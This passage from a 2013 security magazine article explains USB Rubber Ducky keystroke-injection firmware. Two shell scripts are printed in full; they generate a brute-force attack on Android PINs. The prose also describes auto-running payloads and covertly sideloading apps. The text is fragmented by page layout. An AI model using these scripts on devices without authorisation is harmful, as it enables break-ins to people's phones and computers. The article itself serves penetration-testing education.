c_duck_vXX.hex) is a combination of the Keyboard HID Emulation and the Mass Storage device. Now, the HID payload can directly reference
the Drive/Partition of the sdcard mounted on the
actual Ducky. This essentially brings back auto-run
type attacks as no interaction is needed from the
user. The Ducky can type so fast that a small and
simple payload is triggered within a flash!
The code shown in Listing 5 utilizes the power of the Windows Management Instrumentation
Command-line (WMIC) to find the drive letter associated with the label DUCKY, then sets an environment variable to reference the drive. Then, the
payload on the sdcard is executed through the use
of the environment variable. No interaction is required from the user, other than possibly inserting
the Ducky (in disguise as a normal USB Drive) into
their computer. WMIC I only present in Windows,
therefore the payload needs adapting for OSX or
Linux systems (see Listings 6, 7).
Note: Timings may need to be adjusted depending on the speed of the system

Ducky & Mobile Devices


Hak5s Darren Kitchen was the first to test out midnitesnakes new firmware and found the Ducky
would also function on the Android Platform. Darren successfully tested the firmware on the Galaxy Nexus/Note running the Android version 4.2.1.
Darren programmed a script that would utilize the
power of the Ducky to unlock his phone within 24
hours. For this attack to work you will need a compatible USB (micro) On-The-Go (OTG) cable.
With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you are looking at
a best case scenario of exhausting the key space
in about 16.6 hours. Thankfully the USB Rubber
Ducky never gets tired, bored or has to pee.
Page 64

Rather than post the nearly 600K Ducky Script in

Listing 8 and 9 are the bash scripts used to create
it. You could modify it to do 5 digits, but that would
take 166 hours. 10 digits would take 1902.2 years.
The composite firmware can be used to sneakily
install an application onto an Android device. Firstly,
configuring the HID injection payload to alter the security settings to allow software installation from unknown sources. Secondly, the HID payload would
have to navigate to the *.apk program you wish to
install from the micro sdcard (see Listing 10).


The Ducky will additionally work on iOS through

the use of a special USB camera add-on. The USB
camera adapter interfaces with the slightly older
30pin docking interface present on older versions of
the iPad and iPhone. The Ducky has been successfully demonstrated at typing within the notes application. However, the security management on the
PIN/Password entry is slightly different, forcing ever
increasing timeouts after every five incorrect password attempts. No one has currently published any
brute force attack scripts, but it is possible.

Fuzzy Duck

Or rather Ducky Fuzzing is an advanced topic

and not really aimed at beginners. For fuzzing you
need an understanding of C programming and the
HID Protocol. So, how do you use the Ducky as a
simple USB fuzzer?
Solution: You can manipulate the Duckys Firmware configuration files (conf_*.h) to contain overly
large strings, or manipulate the USB Endpoints. If
you have a deeper understanding on the HID protocol specification, you can dig deeper into the
code and tinker with additional values. But beware
that if you break the USB Stack or the HID Proto-

col specification, the Duckys firmware may crash

upon power-up and your fuzzing payload will not
be sent to the host computer. If the Duckys firmware crashes, it is a simple procedure of putting
the Ducky back into DFU mode, and re-flashing
another firmware.
By altering the Duckys USB VID and PID, the
Windows OS will assume the Ducky is the device
specified by its VID PID table, and automatically
load appropriate drivers. On Linux, you can simply alter a udev rule to force the OS into loading
a different kernel module. You can easily pretend
to be different USB devices, effectively turning the
Ducky into an affordable USB Fuzzing Device.
There is no current automation, so, unfortunately,
the firmware has to be recompiled each time you
want to change or alter the configuration. But this
does allow pentesters to effectively fuzz the implementation of the USB stack for various drivers.
The Ducky has been used to find some potentially exploitable bugs within some USB Ethernet
drivers. As a starting point the main file that you will
want to edit for fuzzing is called conf_usb.h, below
are some of the variables you may wish to alter:



White Hat Ducky

The Ducky does not always have to be Black Hat

related device. Rather than limiting the Ducky to

Listing 8. A Linux Bash Script

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING
| sed 0~5 s/$/\nWAIT/g | sed 0~1 s/$/\nDELAY 1000\nENTER\nENTER/g | sed s/WAIT/DELAY
5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g >> android_bruteforce_0000-9999.txt

Listing 9. An OSX Shell Script

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING
| gsed 0~5 s/$/\nWAIT/g | gsed 0~1 s/$/\nDELAY 1000\nENTER\nENTER/g | gsed s/WAIT/DELAY
5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g >> android_bruteforce_0000-9999.txt

05/2013 (24) August

Page 65

attacking systems, applications, or end users, the
Ducky can also be used as a tool to aid or even
complement security. Just check out some of the
scenarios below.
Listing 10. Android Payload Allow Program
Installation from Unknown Sources

Solve Mundane Repetitive Tasks

Once the Ducky is programmed with a set sequence

of commands, it can make complex key combinations or mundane repetitive tasks easily to manage.
Simply, insert the Ducky into the computer or push
the Duckys GPIO button to repeat the given payload. A good example is copying the DeepFreeze
shortcut for restoring a workstation to a clean-image. Instead of your fingers clambering across the
keyboard for CTRL-SHIF-ALT-F6, simply program
the Ducky to type this key-combination.


On The Web

Buy A Ducky Today http://hakshop.myshopify.

Ducky Decode Community Website http://
Simple Ducky Payload Generator
Hak5 Forums USB Rubber Ducky http://forums.
Hak5 Ducky Payloads
The USB Rubber Ducky Definitive Guide v0.B
Atmel Studio

The Ducky can easily remember long complex

password strings, and can function remarkably
similar to a Yubi Key. If the Ducky was solely used
for authentication, if you lose your Ducky, you risk
losing the access and security to any accounts. Instead use the Ducky as a secret token, augmenting your existing passwords with a magic token
generated by the Ducky. Making your passwords
more difficult to crack depending on the format of
the cryptographic hashes used to represent your
secret passphrase.

Open Source Encrypted Storage

One community member The BlueMatt has taken

midnitesnakes original mass storage device firmware (USB_vXX.hex) and added AES encryption
to facilitate an open-source encrypted mass storage device
Storage. The Duckys microcontroller actually supports the AES encryption algorithm http://www. Though currently limited in its application, there is the potential to
further develop this project.


AV: Anti-Virus;
DLP: Data Loss Prevention;
EP: End-Point;
HID: Human Interface Device;
KB: Kilo-Byte (1024 Bytes);
MSC: Mass Storage Class;
OS: Operating System;
OTG: On-The-Go;
PID: Product Identifier;
PIN: Personal Identification Number;
PoC: Proof of Concept;
UDC: USB Device Controller;
UDI: USB Device Interface;
USB: Universal Serial Bus;
VID: Vendor Identifier;
WMIC: Windows Management Instrumentation

05/2013 (24) August


Midnitesnake is a professional penetration tester and

security researcher for Pentura Ltd, a UK Security Company that specialises in Penetration Testing, Consultancy and additional security related services. He has been
working within the computer security field for over 9
years, working within the government and commercial
sectors. He has worked in some of the largest security
companies spanning both sides of the Atlantic. An avid
mentor and keen trainer, midnitesnake has supported
many individuals that now take on senior or managerial roles within several security focused companies. Keen
on several aspects of the computer security field, his talents spread between application, infrastructure, wireless and hardware penetration assessments.

Page 66





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